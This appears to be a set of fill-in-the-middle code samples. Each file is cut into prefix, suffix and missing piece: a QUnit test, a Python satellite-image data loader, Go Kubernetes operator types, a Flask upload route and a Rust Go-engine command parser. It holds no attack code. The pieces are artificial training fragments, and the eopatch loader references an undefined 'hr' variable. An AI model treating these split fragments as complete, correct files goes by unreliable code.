this.createReport({
"tag": "a"
});
var r = null;
this.createReport({
"tag": "b"
}).then(function() {
r = this;
});
|
this.queryReports({
"tag": "a"
}).count(function(count) {
equal(count, 2, "Found two reports");
});
this.subchain(r).then(function() {
this.update().reload().del();
this.then(function() {
start();
});
});
});
});
}(jQuery) ); | this.listReports().count(function(count) {
equal(count, 3, "Found three reports");
}); |
data_loader.py | import os
from collections import OrderedDict
from typing import Tuple, List, Callable
from fs_s3fs import S3FS
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
from skimage.exposure import match_histograms
from datetime import datetime
from eolearn.core import EOPatch
def augment(
lr: np.ndarray,
hr: np.ndarray,
flip: bool = True,
rotate: bool = True,
distribution_shift: bool = False,
distribution_scale: bool = False,
permute_timestamps: bool = True,
max_distribution_shift: float = 0.25,
max_distribution_scale_diff: float = 0.25,
proba_of_original: float = 0.67
) -> Tuple[np.ndarray, np.ndarray]:
"""
Performs a series of image augmentations with specified probability.
:param lr: array of low-resolution images, shape is `CxTxHxW`
:param hr: array of high-resolution images, shape is `CxHxW`
:param flip: whether to randomly flip height or width of arrays
:param rotate: whether to randomly rotate the arrays
:param distribution_shift: add an offset to the distribution
:param distribution_scale: scale the channels distribution
:param permute_timestamps: permute timestamps (not desired for HRN)
:param max_distribution_shift: set max distribution shift used in distribution shift augmentation
:param max_distribution_scale_diff: set max distribution scale used in distribution scale augmentation
:param proba_of_original: set probability of not modifying original patch, e.g. 1 means no augmetnations
:returns: augmented lr and hr arrays
"""
# Base probability which, after `n_aug_conditions`, reduces to `proba_of_original`
n_aug_conditions = sum(1. for aug_op in (flip, rotate, distribution_shift, distribution_scale, permute_timestamps)
if aug_op)
rng_threshold = proba_of_original ** (1. / n_aug_conditions)
if flip and np.random.random() > rng_threshold:
flip_axis = np.random.choice([-2, -1])
lr = np.flip(lr, axis=flip_axis)
hr = np.flip(hr, axis=flip_axis)
if rotate and np.random.random() > rng_threshold:
k = np.random.choice(np.arange(-2, 3))
lr = np.rot90(lr, k=k, axes=(-2, -1))
hr = np.rot90(hr, k=k, axes=(-2, -1))
if distribution_shift and np.random.random() > rng_threshold:
d_shift = (np.random.random() - 0.5) * max_distribution_shift
lr = lr + d_shift
hr = hr + d_shift
if distribution_scale and np.random.random() > rng_threshold:
d_scale = 1. + (np.random.random() - 0.5) * max_distribution_scale_diff
lr_mean = np.mean(lr, axis=(-2, -1))[..., None, None]
hr_mean = np.mean(hr, axis=(-2, -1))[..., None, None]
lr = (lr - lr_mean) * d_scale + lr_mean
hr = (hr - hr_mean) * d_scale + hr_mean
if permute_timestamps and np.random.random() > rng_threshold:
# expects lr in `CxTxHxW` shape
indices = np.random.permutation(lr.shape[1])
lr = lr[:, indices]
return lr, hr
def pad_to_k(feat: np.ndarray, k: int = 16, pad_to_front: bool = True) -> np.ndarray:
""" Create an array with first dimension equal to k, filling with 0s in front or at back """
n_pad = k - len(feat)
if n_pad < 0:
raise ValueError(f'Can not pad when length of features: {len(feat)} is longer than k: {k}')
(_, h, w, c) = feat.shape
if pad_to_front:
feat = np.concatenate((np.zeros(shape=(n_pad, h, w, c)), feat))
else:
feat = np.concatenate((feat, np.zeros(shape=(n_pad, h, w, c))))
return feat
class ImageSet(OrderedDict):
"""
An OrderedDict derived class to group the assets of an imageset, with a pretty-print functionality.
"""
def __init__(self, *args, **kwargs):
super(ImageSet, self).__init__(*args, **kwargs)
def | (self):
dict_info = f"{'name':>10} : {self['name']}"
for name, v in self.items():
if hasattr(v, 'shape'):
dict_info += f"\n{name:>10} : {v.shape} {v.__class__.__name__} ({v.dtype})"
else:
dict_info += f"\n{name:>10} : {v.__class__.__name__} ({v})"
return dict_info
def read_imageset(imset_file: str,
filesystem: S3FS = None,
normalize: bool = True,
country_norm_df: pd.DataFrame = None,
norm_deimos_npz: np.lib.npyio.NpzFile = None,
norm_s2_npz: np.lib.npyio.NpzFile = None,
n_views: int = 16,
padding: str = 'zeros',
histogram_matching: bool = False) -> ImageSet:
"""
Retrieves all assets from the given directory.
:param imset_file: name of npz file with sample imageset
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
frames, `n_views` timeframes from the lrs sequence are taken in reverted order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are prepended to features, or `repeat` where random repeats of
timeframes are taken
:param histogram_matching: whether to match the histogram between the HR and the corresponding LR image
"""
assert padding in ['zeros', 'repeat']
# Read asset names
npz = np.load(filesystem.openbin(imset_file), allow_pickle=True) if filesystem else np.load(imset_file,
allow_pickle=True)
features = npz['features']
hr = npz['labels']
if normalize:
country = npz['countries']
country_stats = country_norm_df[country_norm_df.country == str(country)]
norm_median = country_stats[['median_0', 'median_1', 'median_2', 'median_3']].values
norm_std = country_stats[['std_0', 'std_1', 'std_2', 'std_3']].values
features = (features - norm_median) / norm_std
deimos_p1 = norm_deimos_npz['p1']
deimos_p99 = norm_deimos_npz['p99']
s2_p1 = norm_s2_npz['p1']
s2_p99 = norm_s2_npz['p99']
hr = (hr - deimos_p1) / (deimos_p99 - deimos_p1)
features = (features - s2_p1) / (s2_p99 - s2_p1)
alphas = np.ones(n_views)
if histogram_matching:
hr = match_histograms(hr, features[-1], multichannel=True)
n_feature_timestamps = len(features)
if n_feature_timestamps < n_views:
if padding == 'zeros':
features = pad_to_k(features, n_views, pad_to_front=False)
alphas[n_feature_timestamps:] = 0
elif padding == 'repeat':
n_pad = n_views - n_feature_timestamps
padded = features[-1:].repeat(n_pad, axis=0)
features = np.concatenate((features, padded))
else:
features = features[-n_views:, ...]
# Tensor is `CxTxHxW`
features = np.moveaxis(features, -1, 0)
hr = np.moveaxis(hr, 2, 0)
imageset = ImageSet(name=os.path.basename(imset_file),
timestamp_deimos=str(npz['timetamps_deimos'].item()),
lr=features,
hr=hr,
alphas=alphas)
return imageset
class ImagesetDataset(Dataset):
""" Derived Dataset class for loading many imagesets from a list of directories.
:param imset_dir: name of directory containing files
:param imset_npz_files: list of filenames that constitute the dataset
:param time_first: whether returned lrs sequence should have time dimension first or channels. Use `time_first=True`
if you are training HRN model (`BxTxCxHxW`), `time_first=False` if you are training RAMS
(`BxTxCxHxW`)
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param channels_feats: which channels (i.e. indices) are extracted from lrs sequence
:param channels_labels: which channels (i.e. indices) are extracted from hr image
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
frames, `n_views` timeframes from the lrs sequence are taken in reverted order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are appended to features, or `repeat` where random repeats of
timeframes are taken
:param transform: function executed on lr and hr arrays as augmentation
:param histogram_matching: whether to match the histogram between the HR and the corresponding LR image
"""
def __init__(
self,
imset_dir: str,
imset_npz_files: list,
time_first: bool,
filesystem: object = None,
normalize: bool = True,
country_norm_df: object = None,
norm_deimos_npz: np.ndarray = None,
norm_s2_npz: np.ndarray = None,
channels_feats: List[int] = [0, 1, 2, 3],
channels_labels: List[int] = [0, 1, 2, 3],
n_views: int = 16,
padding: str = 'zeros',
transform: Callable = None,
histogram_matching: bool = False
):
super().__init__()
self.imset_dir = imset_dir
self.filesystem = filesystem
self.imset_npz_files = imset_npz_files
self.time_first = time_first
self.normalize = normalize
self.country_norm_df = country_norm_df
self.norm_deimos_npz = norm_deimos_npz
self.norm_s2_npz = norm_s2_npz
self.channels_feats = channels_feats
self.channels_labels = channels_labels
self.n_views = n_views
self.padding = padding
self.transform = transform
self.histogram_matching = histogram_matching
def __len__(self):
return len(self.imset_npz_files)
def __getitem__(self, index: int) -> ImageSet:
""" Returns an ImageSet dict of all assets in the directory of the given index."""
if isinstance(index, int):
imset_file = os.path.join(self.imset_dir, self.imset_npz_files[index])
else:
raise KeyError('Index must be of type `int`.')
imset = read_imageset(
imset_file=imset_file,
filesystem=self.filesystem,
normalize=self.normalize,
country_norm_df=self.country_norm_df,
norm_deimos_npz=self.norm_deimos_npz,
norm_s2_npz=self.norm_s2_npz,
n_views=self.n_views,
padding=self.padding,
histogram_matching=self.histogram_matching
)
lr = imset['lr'][self.channels_feats]
hr = imset['hr'][self.channels_labels]
if self.transform is not None:
lr, hr = self.transform(lr, hr)
if self.time_first:
lr = np.swapaxes(lr, 0, 1)
imset['lr'] = torch.from_numpy(lr.copy())
imset['hr'] = torch.from_numpy(hr.copy())
imset['alphas'] = torch.from_numpy(imset['alphas'])
return imset
def filter_cloudy_s2(eop, max_cc):
idxs = []
for i, _ in enumerate(eop.timestamp):
if (eop.mask['CLM'][i, ...].mean() <= max_cc) and (eop.mask['IS_DATA'].mean() == 1):
idxs.append(i)
eop.data['BANDS'] = eop.data['BANDS'][idxs, ...]
eop.data['CLP'] = eop.data['CLP'][idxs, ...]
eop.mask['CLM'] = eop.mask['CLM'][idxs, ...]
eop.mask['IS_DATA'] = eop.mask['IS_DATA'][idxs, ...]
eop.timestamp = list(np.array(eop.timestamp)[idxs])
return eop
def timestamps_within_date(timestamps, start_date, end_date):
timestamps = [ts.replace(tzinfo=None) for ts in timestamps] # Remove TZINfo that is present in batch
return [i for i, ts in enumerate(timestamps) if ts >= start_date and ts < end_date]
def read_imageset_eopatch(imset_file: str,
start_date: datetime,
end_date: datetime,
country: str,
filesystem: S3FS = None,
normalize: bool = True,
country_norm_df: pd.DataFrame = None,
norm_s2_npz: np.lib.npyio.NpzFile = None,
n_views: int = 16,
padding: str = 'zeros', histogram_matching: bool = False) -> ImageSet:
"""
Retrieves all assets from the given directory.
:param imset_file: name of npz file with sample imageset
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param start_date: specifies the start of the temporal range of the stack of images used for prediction
:param end_date: specifies the end of the temporal range of the stack of images used for prediction
:param country: specifies the name of the country so it can be matched with the country_norm_df
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
frames, `n_views` timeframes from the lrs sequence are taken in reverted order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are prepended to features, or `repeat` where random repeats of
timeframes are taken
"""
assert padding in ['zeros', 'repeat']
eopatch = EOPatch.load(imset_file, filesystem=filesystem, lazy_loading=True)
noncloudy = filter_cloudy_s2(eopatch, max_cc=0.1)
ts_idxs = timestamps_within_date(noncloudy.timestamp, start_date, end_date)
features = noncloudy.data['BANDS'][ts_idxs, ...] / 10000
filtered_ts = [eopatch.timestamp[tsi] for tsi in ts_idxs]
if normalize:
country_stats = country_norm_df[country_norm_df.country == str(country)]
norm_median = country_stats[['median_0', 'median_1', 'median_2', 'median_3']].values
norm_std = country_stats[['std_0', 'std_1', 'std_2', 'std_3']].values
features = (features - norm_median) / norm_std
s2_p1 = norm_s2_npz['p1']
s2_p99 = norm_s2_npz['p99']
features = (features - s2_p1) / (s2_p99 - s2_p1)
alphas = np.ones(n_views)
if histogram_matching:
hr = match_histograms(hr, features[-1], multichannel=True)
n_feature_timestamps = len(features)
if n_feature_timestamps < n_views:
if padding == 'zeros':
features = pad_to_k(features, n_views, pad_to_front=False)
alphas[n_feature_timestamps:] = 0
elif padding == 'repeat':
n_pad = n_views - n_feature_timestamps
padded = features[-1:].repeat(n_pad, axis=0)
features = np.concatenate((features, padded))
else:
features = features[-n_views:, ...]
# Tensor is `CxTxHxW`
features = np.moveaxis(features, -1, 0)
imageset = ImageSet(name=os.path.basename(imset_file),
lr=features,
alphas=alphas,
ts=filtered_ts[::-1])
return imageset
class EopatchPredictionDataset(Dataset):
""" Derived Dataset class for loading many imagesets from a list of directories.
:param imset_dir: name of directory containing files
:param imset_npz_files: list of filenames that constitute the dataset
:param time_first: whether returned lrs sequence should have time dimension first or channels. Use `time_first=True`
if you are training HRN model (`BxTxCxHxW`), `time_first=False` if you are training RAMS
(`BxTxCxHxW`)
:param filesystem: S3 filesystem to read files directly from bucket. Default reads from local disk
:param start_date: specifies the start of the temporal range of the stack of images used for prediction
:param end_date: specifies the end of the temporal range of the stack of images used for prediction
:param country: specifies the name of the country so it can be matched with the country_norm_df
:param normalize: whether to normalize data or not
:param country_norm_df: S2 median/std normalization factors stored per country
:param norm_deimos_npz: 1st and 99th percentile normalization factors for DEIMOS
:param norm_s2_npz: 1st and 99th percentile normalization factors for S2
:param channels_feats: which channels (i.e. indices) are extracted from lrs sequence
:param channels_labels: which channels (i.e. indices) are extracted from hr image
:param n_views: number of time frames to consider in lrs sequence. If n_views is smaller than the available time
frames, `n_views` timeframes from the lrs sequence are taken in reverted order, i.e. last is first
:param padding: strategy used to fill lrs sequence if n_views is greater than available timestamps. Supported
options are `zeros`, where 0 frames are appended to features, or `repeat` where random repeats of
timeframes are taken
:param transform: function executed on lr and hr arrays as augmentation
"""
def __init__(
self,
imset_dir: str,
imset_npz_files: list,
time_first: bool,
start_date: datetime,
end_date: datetime,
country: str,
filesystem: object = None,
normalize: bool = True,
country_norm_df: object = None,
norm_deimos_npz: np.ndarray = None,
norm_s2_npz: np.ndarray = None,
channels_feats: List[int] = [0, 1, 2, 3],
n_views: int = 16,
padding: str = 'zeros',
histogram_matching: bool = False
):
super().__init__()
self.imset_dir = imset_dir
self.filesystem = filesystem
self.imset_npz_files = imset_npz_files
self.time_first = time_first
self.normalize = normalize
self.country_norm_df = country_norm_df
self.norm_deimos_npz = norm_deimos_npz
self.norm_s2_npz = norm_s2_npz
self.channels_feats = channels_feats
self.n_views = n_views
self.padding = padding
self.start_date = start_date
self.end_date = end_date
self.histogram_matching = histogram_matching
self.country = country
def __len__(self):
return len(self.imset_npz_files)
def __getitem__(self, index: int) -> ImageSet:
""" Returns an ImageSet dict of all assets in the directory of the given index."""
if isinstance(index, int):
imset_file = os.path.join(self.imset_dir, self.imset_npz_files[index])
else:
raise KeyError('Index must be of type `int`.')
imset = read_imageset_eopatch(
imset_file=imset_file,
filesystem=self.filesystem,
normalize=self.normalize,
country_norm_df=self.country_norm_df,
norm_deimos_npz=self.norm_deimos_npz,
norm_s2_npz=self.norm_s2_npz,
n_views=self.n_views,
padding=self.padding,
start_date=self.start_date,
end_date=self.end_date,
country=self.country,
histogram_matching=self.histogram_matching,
)
lr = imset['lr'][self.channels_feats]
if self.time_first:
lr = np.swapaxes(lr, 0, 1)
imset['lr'] = torch.from_numpy(lr.copy())
imset['alphas'] = torch.from_numpy(imset['alphas'])
return imset
| __repr__ |
kabanero_types.go | package v1alpha1
import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// EDIT THIS FILE! THIS IS SCAFFOLDING FOR YOU TO OWN!
// NOTE: json tags are required. Any new fields you add must have json tags for the fields to be serialized.
// NOTE: The +listType=set marker is required by OpenAPI generation for list types.
// +kubebuilder:subresource:status
// KabaneroSpec defines the desired state of Kabanero
// +k8s:openapi-gen=true
type KabaneroSpec struct {
// INSERT ADDITIONAL SPEC FIELDS - desired state of cluster
// Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file
// Add custom validation using kubebuilder tags: https://book.kubebuilder.io/beyond_basics/generating_crd.html
Version string `json:"version,omitempty"`
// +listType=set
TargetNamespaces []string `json:"targetNamespaces,omitempty"`
Github GithubConfig `json:"github,omitempty"`
Collections InstanceCollectionConfig `json:"collections,omitempty"`
Tekton TektonCustomizationSpec `json:"tekton,omitempty"`
CliServices KabaneroCliServicesCustomizationSpec `json:"cliServices,omitempty"`
Landing KabaneroLandingCustomizationSpec `json:"landing,omitempty"`
Che CheCustomizationSpec `json:"che,omitempty"`
Events EventsCustomizationSpec `json:"events,omitempty"`
CollectionController CollectionControllerSpec `json:"collectionController,omitempty"`
AdmissionControllerWebhook AdmissionControllerWebhookCustomizationSpec `json:"admissionControllerWebhook,omitempty"`
}
// InstanceCollectionConfig defines the customization entries for a set of collections.
type InstanceCollectionConfig struct {
// +listType=map
// +listMapKey=url
Repositories []RepositoryConfig `json:"repositories,omitempty"`
}
// GithubConfig represents the Github information (public or GHE) where
// the organization and teams managing the collections live. Members
// of the specified team in the specified organization will have admin
// authority in the Kabanero CLI.
type GithubConfig struct {
Organization string `json:"organization,omitempty"`
// +listType=set
Teams []string `json:"teams,omitempty"`
ApiUrl string `json:"apiUrl,omitempty"`
}
// RepositoryConfig defines customization entries for a collection.
type RepositoryConfig struct {
Name string `json:"name,omitempty"`
Url string `json:"url,omitempty"`
ActivateDefaultCollections bool `json:"activateDefaultCollections,omitempty"`
SkipCertVerification bool `json:"skipCertVerification,omitempty"`
}
// TektonCustomizationSpec defines customization entries for Tekton
type TektonCustomizationSpec struct {
Disabled bool `json:"disabled,omitempty"`
Version string `json:"version,omitempty"`
}
// KabaneroCliServicesCustomizationSpec defines customization entries for the Kabanero CLI.
type KabaneroCliServicesCustomizationSpec struct {
//Future: Enable bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
SessionExpirationSeconds string `json:"sessionExpirationSeconds,omitempty"`
}
// KabaneroLandingCustomizationSpec defines customization entries for Kabanero landing page.
type KabaneroLandingCustomizationSpec struct {
Enable *bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
}
// CheCustomizationSpec defines customization entries for Che.
type CheCustomizationSpec struct {
Enable *bool `json:"enable,omitempty"`
CheOperatorInstance CheOperatorInstanceSpec `json:"cheOperatorInstance,omitempty"`
KabaneroChe KabaneroCheSpec `json:"kabaneroChe,omitempty"`
}
// CheOperatorInstanceSpec defines customization entries for the Che operator instance.
type CheOperatorInstanceSpec struct {
CheWorkspaceClusterRole string `json:"cheWorkspaceClusterRole,omitempty"`
}
// KabaneroCheSpec defines customization entries for Kabanero Che.
type KabaneroCheSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
type EventsCustomizationSpec struct {
Enable bool `json:"enable,omitempty"`
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
// CollectionControllerSpec defines customization entried for the Kabanero collection controller.
type CollectionControllerSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
type AdmissionControllerWebhookCustomizationSpec struct {
Version string `json:"version,omitempty"`
Image string `json:"image,omitempty"`
Repository string `json:"repository,omitempty"`
Tag string `json:"tag,omitempty"`
}
// KabaneroStatus defines the observed state of the Kabanero instance.
// +k8s:openapi-gen=true
type KabaneroStatus struct {
// Kabanero operator instance readiness status. The status is directly correlated to the availability of resources dependencies.
KabaneroInstance KabaneroInstanceStatus `json:"kabaneroInstance,omitempty"`
// Knative eventing instance readiness status.
KnativeEventing KnativeEventingStatus `json:"knativeEventing,omitempty"`
// OpenShift serverless operator status.
Serverless ServerlessStatus `json:"serverless,omitempty"`
// Tekton instance readiness status.
Tekton TektonStatus `json:"tekton,omitempty"`
// CLI readiness status.
Cli CliStatus `json:"cli,omitempty"`
// Kabanero Landing page readiness status.
Landing *KabaneroLandingPageStatus `json:"landing,omitempty"`
// Appsody instance readiness status.
Appsody AppsodyStatus `json:"appsody,omitempty"`
// Kabanero Application Navigator instance readiness status.
Kappnav *KappnavStatus `json:"kappnav,omitempty"`
// Che instance readiness status.
Che *CheStatus `json:"che,omitempty"`
// Events instance status
Events *EventsStatus `json:"events,omitempty"`
// Kabanero collection controller readiness status.
CollectionController CollectionControllerStatus `json:"collectionController,omitempty"`
// Admission webhook instance status
AdmissionControllerWebhook AdmissionControllerWebhookStatus `json:"admissionControllerWebhook,omitempty"`
}
// KabaneroInstanceStatus defines the observed status details of Kabanero operator instance
type KabaneroInstanceStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// TektonStatus defines the observed status details of Tekton.
type TektonStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// KnativeEventingStatus defines the observed status details of Knative Eventing.
type KnativeEventingStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// ServerlessStatus defines the observed status details of Open Shift serverless.
type ServerlessStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
KnativeServing KnativeServingStatus `json:"knativeServing,omitempty"`
}
// KnativeServingStatus defines the observed status details of Knative Serving.
type KnativeServingStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// CliStatus defines the observed status details of the Kabanero CLI.
type CliStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
Hostnames []string `json:"hostnames,omitempty"`
}
// KabaneroLandingPageStatus defines the observed status details of the Kabanero landing page.
type KabaneroLandingPageStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// AppsodyStatus defines the observed status details of Appsody.
type AppsodyStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// KappnavStatus defines the observed status details of Kubernetes Application Navigator.
type KappnavStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
UiLocations []string `json:"uiLocations,omitempty"`
// +listType=set
ApiLocations []string `json:"apiLocations,omitempty"`
}
// CheStatus defines the observed status details of Che.
type CheStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
CheOperator CheOperatorStatus `json:"cheOperator,omitempty"`
KabaneroChe KabaneroCheStatus `json:"kabaneroChe,omitempty"`
KabaneroCheInstance KabaneroCheInstanceStatus `json:"kabaneroCheInstance,omitempty"`
}
// CheOperatorStatus defines the observed status details of the Che operator.
type CheOperatorStatus struct {
Version string `json:"version,omitempty"`
}
// KabaneroCheStatus defines the observed status details of Kabanero Che.
type KabaneroCheStatus struct {
Version string `json:"version,omitempty"`
}
// KabaneroCheInstanceStatus defines the observed status details of Che instance.
type KabaneroCheInstanceStatus struct {
CheImage string `json:"cheImage,omitempty"`
CheImageTag string `json:"cheImageTag,omitempty"`
CheWorkspaceClusterRole string `json:"cheWorkspaceClusterRole,omitempty"`
}
// EventsStatus defines the observed status details of the Kabanero events.
type EventsStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
// +listType=set
Hostnames []string `json:"hostnames,omitempty"`
}
// CollectionControllerStatus defines the observed status details of the Kabanero collection controller.
type CollectionControllerStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
Version string `json:"version,omitempty"`
}
// AdmissionControllerWebhookStatus defines the observed status details of the Kabanero mutating and validating admission webhooks.
type AdmissionControllerWebhookStatus struct {
Ready string `json:"ready,omitempty"`
ErrorMessage string `json:"errorMessage,omitempty"`
}
// Kabanero is the Schema for the kabaneros API
// Note that kubebuilder and operator-sdk currently disagree about what the
// plural of this type should be. The +kubebuilder:resource marker sets the
// plural to what operator-sdk expects.
// +k8s:openapi-gen=true
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:subresource:status
// +kubebuilder:printcolumn:name="Age",type="date",JSONPath=".metadata.creationTimestamp",description="CreationTimestamp is a timestamp representing the server time when this object was created. It is not guaranteed to be set in happens-before order across separate operations."
// +kubebuilder:printcolumn:name="Version",type="string",JSONPath=".status.kabaneroInstance.version",description="Kabanero operator instance version."
// +kubebuilder:printcolumn:name="Ready",type="string",JSONPath=".status.kabaneroInstance.ready",description="Kabanero operator instance readiness status. The status is directly correlated to the availability of the operator's resources dependencies."
// +kubebuilder:resource:path=kabaneros,scope=Namespaced
// +kubebuilder:unservedversion
type Kabanero struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec KabaneroSpec `json:"spec,omitempty"`
Status KabaneroStatus `json:"status,omitempty"`
}
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// KabaneroList contains a list of Kabanero
type KabaneroList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
// +listType=set
Items []Kabanero `json:"items"`
}
func | () {
SchemeBuilder.Register(&Kabanero{}, &KabaneroList{})
}
| init |
main.py | from flask import Flask, session, request
app = Flask(__name__)
@app.route('/upload', methods=['GET', 'POST'])
def hello_world():
| if request.method == 'POST':
session['audio_data'] = request.form['audio_data']
print(session['audio_data'])
# abc = vars(request)
# for i in abc:
# print(i)
return "Uploaded Audio"
return 'Hello, World!' |
|
mod.rs | // Copyright 2019 Karl Sundequist Blomdahl <[email protected]>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use regex::Regex;
use std::env;
use std::fs::File;
use std::io::{BufRead, BufReader, Read};
use std::time::Instant;
use dg_go::utils::score::{Score, StoneStatus};
use dg_go::utils::sgf::Sgf;
use dg_go::{DEFAULT_KOMI, Board, Color, Point};
use dg_mcts::time_control::{TimeStrategy, RolloutLimit, ByoYomi};
use dg_mcts as mcts;
use dg_utils::config;
mod ponder_service;
mod time_settings;
mod vertex;
use self::vertex::*;
use self::ponder_service::PonderService;
use dg_mcts::options::{SearchOptions, ScoringSearch, StandardSearch};
use dg_mcts::tree::GreedyPath;
/// List containing all implemented commands, this is used to implement
/// the `list_commands` and `known_command` commands.
const KNOWN_COMMANDS: [&str; 24] = [
"protocol_version", "name", "version", "gomill-describe_engine", "gomill-cpu_time",
"boardsize", "clear_board", "komi", "play",
"list_commands", "known_command", "showboard", "genmove", "reg_genmove",
"kgs-genmove_cleanup", "gomill-explain_last_move", "undo",
"time_settings", "kgs-time_settings", "time_left", "quit",
"final_score", "final_status_list", "loadsgf"
];
#[derive(Clone, Debug, PartialEq)]
enum GenMoveMode {
Normal,
CleanUp,
Regression
}
impl GenMoveMode {
fn is_cleanup(&self) -> bool {
*self == GenMoveMode::CleanUp
}
fn is_regression(&self) -> bool {
*self == GenMoveMode::Regression
}
fn search_strategy(&self) -> Box<dyn SearchOptions + Sync> {
if self.is_cleanup() {
Box::new(ScoringSearch::default())
} else {
Box::new(StandardSearch::default())
}
}
}
#[derive(Debug, PartialEq)]
enum Command {
Pass, // do nothing
ProtocolVersion, // report protocol version
Name, // report the name of the program
Version, // report the version number of the program
BoardSize(usize), // set the board size to NxN
ClearBoard, // clear the board
CpuTime, // write the number of (cpu) seconds spent thinking
DescribeEngine, // write a description of the engine
ExplainLastMove, // write a description of why the last move was played
Komi(f32), // set the komi
Play(Color, Option<Point>), // play a stone of the given color at the given vertex
ListCommands, // list all available commands
KnownCommand(String), // tell whether a command is known
ShowBoard, // write the position to stdout
GenMove(Color, GenMoveMode), // generate and play the supposedly best move for either color
FinalScore, // write the score to stdout
FinalStatusList(StoneStatus), // write status of stones to stdout
LoadSgf(String, usize), // load SGF file
Undo, // undo one move
TimeSettingsNone, // set the time settings
TimeSettingsAbsolute(f32), // set the time settings
TimeSettingsCanadian(f32, f32, usize), // set the time settings
TimeSettingsByoYomi(f32, f32, usize), // set the time settings
TimeLeft(Color, f32, usize), // set the remaining time for the given color
Quit // quit
}
macro_rules! success {
($id:expr, $message:expr) => ({
match $id {
None => println!("= {}\n", $message),
Some(id) => println!("={} {}\n", id, $message)
}
})
}
macro_rules! error {
($id:expr, $message:expr) => ({
match $id {
None => println!("? {}\n", $message),
Some(id) => println!("?{} {}\n", id, $message)
}
})
}
lazy_static! {
static ref ID_PREFIX: Regex = Regex::new(r"^([0-9]+)(?: +(.*)$|$)").unwrap();
static ref BOARD_SIZE: Regex = Regex::new(r"^boardsize +([0-9]+)").unwrap();
static ref KOMI: Regex = Regex::new(r"^komi +(-?[0-9\.]+)").unwrap();
static ref PLAY: Regex = Regex::new(r"^play +([bBwW]) +([a-z][0-9]+|pass)").unwrap();
static ref KNOWN_COMMAND: Regex = Regex::new(r"^known_command +([^ ]+)").unwrap();
static ref GENMOVE: Regex = Regex::new(r"^genmove +([bw])").unwrap();
static ref REG_GENMOVE: Regex = Regex::new(r"^reg_genmove +([bw])").unwrap();
static ref KGS_GENMOVE_CLEANUP: Regex = Regex::new(r"^kgs-genmove_cleanup +([bw])").unwrap();
static ref FINAL_STATUS_LIST: Regex = Regex::new(r"^final_status_list +(dead|alive|seki|black_territory|white_territory)").unwrap();
static ref LOADSGF: Regex = Regex::new(r"^loadsgf +([^ ]+) *([0-9]+)?").unwrap();
